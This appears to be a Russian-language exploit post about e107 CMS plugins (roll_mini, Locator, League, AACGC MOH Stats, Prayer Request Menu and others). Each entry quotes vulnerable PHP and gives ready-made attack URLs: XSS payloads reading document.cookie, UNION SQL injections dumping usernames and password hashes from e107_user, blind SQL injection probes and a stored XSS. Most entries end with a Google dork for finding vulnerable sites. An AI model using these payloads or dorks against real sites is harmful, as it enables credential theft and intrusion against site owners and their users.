roll_mini v1.2 XSS: /roll.php PHP: if ($_GET['cat']) $id_cat = $_GET['cat']; else $id_cat = "1"; Пример: Code: http://e107/e107_plugins/roll_mini/roll.php?cat=%3Cscript%3Ealert(document.cookie)%3C/script%3E Необходимы права администратора, SQL injection: /roll.php PHP: if ($_GET['cat']) $id_cat = $_GET['cat']; else $id_cat = "1"; if ($_GET['add']) $add = $_GET['add']; if ($_GET['edit']) $edit = $_GET['edit']; if ($_GET['card_id']) $card_id = $_GET['card_id']; if ($_GET['index_name']) $index_name = $_GET['index_name']; if ($_GET['search']) $search = $_GET['search']; if ($_GET['page']) { $page = $_GET['page']; } else { $page = 1; } А дальше там обращения к БД с этими переменными. Ничего не фильтруется. Пример: Code: http://e107/e107_plugins/roll_mini/roll.php?cat=%3Cscript%3Ealert(document.cookie)%3C/script%3E&card_id=-1%20union%20select%201,2,concat_ws(0x3a,user_name,user_password),4,5,6%20from%20e107_user&edit=1 Путь: http://e107/e107_plugins/roll_mini/search.php Дорк:inurl:e107_plugins/roll_mini/
Locator v1.2 Необходимы права администратора, SQL injection: /admin_countries.php PHP: $sql -> db_Select(DB_TABLE_LOCATOR_COUNTRY, "*", "locator_country_id=".$_GET['locator_country_id']); Пример: Code: http://e107/e107_plugins/locator/admin_countries.php?edit_country=1&locator_country_id=1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4%20from%20e107_user-- Необходимы права администратора, SQL injection: /admin_categories.php PHP: $sql -> db_Select(DB_TABLE_LOCATOR_TABLE, "*", "locator_cat_id=".$_GET['locator_cat_id']); Пример: Code: http://e107/e107_plugins/locator/admin_categories.php?edit_category=1&locator_cat_id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11-- В админке ещё много чего бажного. Дорк:inurl:e107_plugins/locator/
League Version 1.04 SQL injection: /lique.php PHP: ... if($_GET['Saison']){$Saison=$_GET['Saison'];} ... $query[0]="lique_games"; $query[1]="*"; $query[2]="games_home_id=".$pref['lique_my_team']." AND games_saison_id=".$Saison." AND games_date<".$A=(time()-86400)." AND games_date>".(time()-604500)." OR games_gast_id=".$pref['lique_my_team']." AND games_date<".$A=(time()-86400)." AND games_date>".(time()-604500)." ORDER BY games_date "; ... Пример: Code: http://e107/e107_plugins/lique/lique.php?Saison=-2%20union%20select%201,concat_ws%280x3a,user_name,user_password%29,3,4,5%20from%20e107_user-- Blind SQL injection: /scorer.php PHP: ... if($_GET['Saison']){$Saison=$_GET['Saison'];}else{$Saison=$pref['lique_my_saison'];} if($_GET['team']){$team=$_GET['team'];}else{$team=$pref['lique_my_team'];} $z['games']=0; $sql -> db_Select("lique_games", "*", "games_home_id=".$team." OR games_gast_id=".$team." "); while($row = $sql-> db_Fetch()){ $z['games']++; } $qry1=" SELECT m.*, me.* FROM ".MPREFIX."lique_liga AS m LEFT JOIN ".MPREFIX."lique_teams AS me ON me.team_id=m.liga_team_id WHERE m.liga_id ='".$team."' "; $sql->db_Select_gen($qry1); $row = $sql-> db_Fetch(); $team_ID=$row['team_id']; $team_Name=$row['team_name']; $team_admin=$row['team_admin_id']; $team_url=$row['team_url']; $team_icon=$row['team_icon']; $team_description=$row['team_description']; $z['players']=0; $sql -> db_Select("lique_roster", "*", "roster_team_id=".$team.""); while($row = $sql-> db_Fetch()){ $z['players']++; } ... Пример: Code: http://e107/e107_plugins/lique/scorer.php?team=1%20and%20substring%28@@version,1,1%29=5 Blind SQL injection: /strafen.php PHP: ... if($_GET['Saison']){$Saison=$_GET['Saison'];}else{$Saison=$pref['lique_my_saison'];} if($_GET['team']){$team=$_GET['team'];}else{$team=$pref['lique_my_team'];} $z['games']=0; $sql -> db_Select("lique_games", "*", "games_home_id=".$team." OR games_gast_id=".$team." "); while($row = $sql-> db_Fetch()){ $z['games']++; } $qry1=" SELECT m.*, me.* FROM ".MPREFIX."lique_liga AS m LEFT JOIN ".MPREFIX."lique_teams AS me ON me.team_id=m.liga_team_id WHERE m.liga_id ='".$team."' "; $sql->db_Select_gen($qry1); $row = $sql-> db_Fetch(); $team_ID=$row['team_id']; $team_Name=$row['team_name']; $team_admin=$row['team_admin_id']; $team_url=$row['team_url']; $team_icon=$row['team_icon']; $team_description=$row['team_description']; $z['players']=0; $sql -> db_Select("lique_roster", "*", "roster_team_id=".$team.""); while($row = $sql-> db_Fetch()){ $z['players']++; } ... Пример: Code: http://e107/e107_plugins/lique/strafen.php?team=1%20and%20substring%28@@version,1,1%29=5 И много ещё чего бажного... Дорк:inurl:e107_plugins/lique/
AACGC MOH Stats V1.0 SQL injection: /Member_Details.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... $sql ->db_Select("user_extended", "*", "WHERE user_extended_id=$sub_action",""); $row = $sql->db_Fetch(); $sql2 ->db_Select("user", "*", "WHERE user_id='".$row['user_extended_id']."'",""); ... Пример: Code: http://e107/e107_plugins/aacgc_mohstats/Member_Details.php?det.2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36-- Дорк:inurl:e107_plugins/aacgc_mohstats/
Userclass Images v09 Beta Необходимы права администратора, SQL injection: /admin.php PHP: ... $q = "SELECT * FROM ".MPREFIX."userclass_images WHERE userclass_id='$_POST[uid]'"; ...
EveryPage v1.0 Необходимы права администратора, SQL injection: /admin_config.php PHP: ... $query = "ep_text='". $_POST['code'] ."' WHERE ep_id='". $_POST['id'] ."'"; ...
Prayer Request Menu Version 2.5 Active XSS: /prayers.php PHP: ... $_POST['prayer_name']; $_POST['prayer_body']; ... Выше перечисленные переменные никак не фильтруются, в итоге бы получаем активную XSS! Заходим на страницу http://e107/e107_plugins/prayer_menu/prayers.php?0.submit.0.0.0 и добавляем коммент с содежанием "<script>alert(111)</script>" в формы "Title and Prayer Request" Дорк:inurl:e107_plugins/prayer_menu/ P.S выполнял под правами администратора. Так что не отвечаю за смертных юзеров
